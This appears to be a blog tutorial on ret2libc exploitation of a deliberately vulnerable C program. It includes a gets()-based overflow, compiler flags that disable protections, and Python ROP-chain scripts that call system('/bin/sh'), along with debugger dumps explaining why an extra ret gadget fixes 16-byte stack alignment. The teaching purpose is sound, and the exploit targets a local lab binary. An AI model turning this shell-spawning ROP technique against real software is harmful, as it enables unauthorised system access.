While learning about ret2libc exploitation, I encountered a stack alignment issue that initially confused me. After spending some time debugging, I finally understood why we add that extra ret instruct for the solution. I thought it would be valuable to share this insight with you all, in case it helps someone facing the same problem.
Lets look at the memory layout
Our key interest Right now, is the stack!
Stack is a part of memory used for:
- Function calls (return addresses)
- Function arguments (sometimes if your function has more than 6 argument)
- Local variables
-
The first 6 arguments are on the following Registers (RDI, RSI, RDX, RCX, R8, R9), rest of the arguments will get into Stack
Now, you must be aware with buffer overflow and ret2libc attacks for proceeding further on this article.
#include <stdio.h>
#include <stdlib.h>
// Vulnerable function
void vuln_func() {
char buffer[8]; // Small buffer (8 bytes)
puts("The buffer is small now, enter some data:");
//gets() is unsafe and causes buffer overflows.
gets(buffer);
}
int main() {
puts("Calling vulnerable function...");
vuln_func();
return 0;
}
all:
gcc -no-pie -fno-stack-protector vulnerable.c -o vulnerable -D_FORTIFY_SOURCE=0 -std=c99
clean:
rm -f vulnerablee
This compiles your vulnerable.c
file with exploitation-friendly settings
+-------------------------------------------------------------+
| GCC Compilation Flags |
+------------------------+------------------------------------+
| Flag | Description |
+------------------------+------------------------------------+
| -no-pie | Disables PIE (Position-Independent |
| | Executable). |
| | Ensures fixed memory addresses in |
| | the binary (e.g., main, puts). |
+------------------------+------------------------------------+
| -fno-stack-protector | Disables stack canary protection. |
| | Allows buffer overflows without |
| | detection. |
+------------------------+------------------------------------+
| -D_FORTIFY_SOURCE=0 | Turns off extra glibc checks for |
| | functions like gets(), strcpy(). |
| | Prevents automatic abort on unsafe |
| | operations. |
+------------------------+------------------------------------+
| -std=c99 | Compiles using C99 standard. |
| | Ensures compatibility and better |
| | behavior in modern compilers. |
+------------------------+------------------------------------+
| -z execstack (missing) | This flag is NOT included here. |
| | It would allow execution on stack |
| | (needed for shellcode sometimes). |
| | This binary has non-executable |
| | stack (default in modern Linux). |
+------------------------+------------------------------------+
File: exploit.py
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ import struct
2 │ libc_base = 0x7ffff7da9000
3 │ payload = b"A" * 8 # offset to rbp
4 │ payload += b"B" * 8 # rbp
5 │ payload += struct.pack("<Q", libc_base + 0x000000000002a145) # pop rdi; ret;
6 │ payload += struct.pack("<Q", 0x7ffff7f50ea4) # address of /bin/sh
7 │ payload += struct.pack("<Q", 0x7ffff7dfc110) # address of System function()
8 │ payload += struct.pack("<Q", 0x7ffff7deb340) # address of exit function
9 │
10 │ #we are using option <Q>, because we want to convert these 64 bit addresses to little endian format
11 │
12 │
13 │ # print(payload)
14 │ with open("exploit1", "wb") as f:
15 │ f.write(payload)
16 │
17 │ print("Payload written to exploit1. Run with: `./vulnerable_program < input.txt`")
This is the exploit I wrote while performing a ret2libc attack. The goal is to call the system()
function with "/bin/sh"
as its argument in order to spawn a shell. To do this, we use a ROP gadget — specifically pop rdi; ret
— which is used to load the address of the "/bin/sh"
string into the RDI register, as required by the x86-64 calling convention (where the first function argument is passed via RDI).
After setting up the argument, we place the address of the system() function in the chain, which will be executed next. Finally, we include the address of the exit function so that once system returns, the program exits cleanly without crashing.
pwndbg> disassemble vuln_func
pwndbg> break *0x000000000040115b
or
pwndbg> break *vuln_func + 37
run the binary with the exploit we wrote above.
We hit the Brekpoint
The stack looks perfect
────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdc28 —▸ 0x7ffff7dd3145 (iconv+181) ◂— pop rdi
01:0008│ 0x7fffffffdc30 —▸ 0x7ffff7f50ea4 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:0010│ 0x7fffffffdc38 —▸ 0x7ffff7dfc110 (system) ◂— test rdi, rdi
03:0018│ 0x7fffffffdc40 —▸ 0x7ffff7deb340 (exit) ◂— sub rsp, 8
Stack diagram
┌────────────────────────────────────────────┐
High addr → │ "AAAA AAAA" (8‑byte padding) │
├────────────────────────────────────────────┤
│ "BBBB BBBB" (fake saved RBP) │
├────────────────────────────────────────────┤
│ 0x7fffffffdc28 → pop rdi ; ret (libc) │ ← first RET jumps here
├────────────────────────────────────────────┤
│ 0x7fffffffdc30 → "/bin/sh" string │ ← popped into RDI
├────────────────────────────────────────────┤
│ 0x7fffffffdc38 → system() │ ← second RET jumps here
├────────────────────────────────────────────┤
│ 0x7fffffffdc40 → exit() │ ← system() returns here
Low addr → └────────────────────────────────────────────┘
I had some glitch in pwndbg, so i have shifted to gef.
rdi: 0x00007ffff7f50ea4 → 0x0068732f6e69622f ("/bin/sh"?)
Calling System Function
$rip : 0x00007ffff7dfc110 → <system+0000> test rdi, rdi
Everything was fine until we got this
► 0x7ffff7dfbdf4 <do_system+356> movaps xmmword ptr [rsp + 0x50], xmm0 <[0x7fffffffd8e8] not aligned to 16 bytes>
I saw some of the articles on internet talking about this issue, I am sharing those here for your reference:
https://security.stackexchange.com/questions/278592/ret2libc-exploit-not-working-but-it-seems-correct-in-gdb#:~:text=There%20is%20a%20great%20chance,stack%20may%20not%20aligned%20propertly
https://c9x.me/compile/doc/abi.html#:~:text=The%20ABI%20is%20unclear%20on,0%20mod%2016
https://stackoverflow.com/questions/67243284/why-movaps-causes-segmentation-fault#:~:text=%3E%20MOVAPS%E2%80%94Move%20Aligned%20Packed%20Single,GP%29%20will%20be%20generated
The key is that just before calling system()
(i.e. at the entry to system
) the stack pointer %rsp
must satisfy the AMD64 ABI’s alignment requirements. By the AMD64 ABI, RSP must be 16-byte aligned at every call
instruction.
Before any call
instruction, %rsp
must be a multiple of 16
“Just before
call
,%rsp % 16 == 0
. On function entry,%rsp % 16 == 8
.”
%rsp ≡ 0 mod 16 ----> rsp % 16 = 0
The address of rsp should be the multiple of 16.
Lets go the our Vulnerable Binary, run it again inside gdb.
hit the breakpoint at the ret instruction.
ret will take the address of our gadget pop rdi ; ret and load it inside the rip
gef➤ si
Remember that rule?
“Just before
call
,%rsp % 16 == 0
. On function entry,%rsp % 16 == 8
.”
Just Before call, %rsp % 16 == 0
. but we are getting
gef➤ !python3 -c 'print(0x00007fffffffdd08 % 16)'
8
Now thats where the problem is.
Now we are at the entry of the system function
ABI expects – On function entry,
%rsp % 16 == 8
.but we are getting
%rsp % 16 == 0
Correct Stack Alignment:
rsp % 16 = 8 <- This is what ABI expects after 'call'
system() works fine
Misaligned Stack:
rsp % 16 = 0 <- Due to raw ROP chain
and you get that Movaps issue
When you normally call a function on x86_64, the hardware does two things under the hood:
call target
- Pushes the return address (8 bytes) onto the stack
- Decrements
rsp
by 8 (stack grows downward) - Jumps to
target
Inside the callee, on entry you see
rsp % 16 == 8
— exactly what the ABI expects.
However, in a ROP chain you don’t use call
; you stitch together a series of ret
instructions instead. Each ret
does:
- Pop the top 8 bytes from the stack into the instruction pointer
- Increments
rsp
by 8 (stack “shrinks” upward)
Therefore, If you build a ROP chain without caring about alignment, each gadget’s ret
will keep adding +8 to rsp
. By the time you hit system()
, your rsp
can be at a multiple of 16 (i.e. rsp % 16 == 0
), which the ABI does not allow on function entry. Glibc then immediately executes a movaps
on the (misaligned) stack and you get a General Protection Fault.
Updated Exploit
File: exploit.py
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ import struct
2 │ libc_base = 0x7ffff7da9000
3 │ payload = b"A" * 8 # offset to rbp
4 │ payload += b"B" * 8 # rbp
5 │ payload += struct.pack("<Q", libc_base + 0x00000000000f7bb3) # ret;
6 │ payload += struct.pack("<Q", libc_base + 0x000000000002a145) # pop rdi; ret;
7 │ payload += struct.pack("<Q", 0x7ffff7f50ea4) # address of /bin/sh
8 │ payload += struct.pack("<Q", 0x7ffff7dfc110) # address of System function()
9 │ payload += struct.pack("<Q", 0x7ffff7deb340) # address of exit function
10 │
11 │ #we are using option <Q>, because we want to convert these 64 bit addresses to little endian format
12 │
13 │
14 │ # print(payload)
15 │ with open("exploit1", "wb") as f:
16 │ f.write(payload)
17 │
18 │ print("Payload written to exploit1. Run with: `./vulnerable_program < input.txt`")
Lets verify our exploit
So, hope you guys now have finally understood the stack allignment problem, and why use that extra ret gadget.
Happy hacking ;)